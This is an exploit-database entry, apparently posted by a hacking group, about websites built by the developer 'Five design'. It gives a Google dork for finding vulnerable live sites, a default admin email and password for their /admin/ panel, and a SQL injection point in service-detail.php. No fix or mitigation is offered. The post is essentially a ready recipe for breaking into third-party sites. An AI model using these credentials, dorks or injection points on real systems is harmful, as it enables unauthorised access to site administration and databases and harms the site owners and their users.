Developed by Five design Vulnerability SQL Injection And Admin Default Pass

2021.03.22
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Title : Developed by Five design Vulnerability SQL Injection And Admin Default Pass # Date : 13/03/2021 # Author : Jenderal92 # Category : webapps # Vendor : http://fivedesign.in/ # Tested On : Android 9, Chrome # Exploit Path Admin : site.com/admin/ # Google Dork : intext:"developed by Five design" # Proof Of Concept Default Pass : Dorking Using Dork Above, Put The Exploit # exp : site.com/admin/ # Fill in the username and password # Username : admin@gmail.com # Password : Hello12345 #Proof Of Concept SQL Injection : #Example http://www.site.com/service-detail.php?detail=9' inject Here Greetz : Baku Hantam Crew - Purwokerto Ghost - Ajibarang1337

References:

https://www.blog-gan.org/2021/03/developed-by-five-design-vulnerability.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top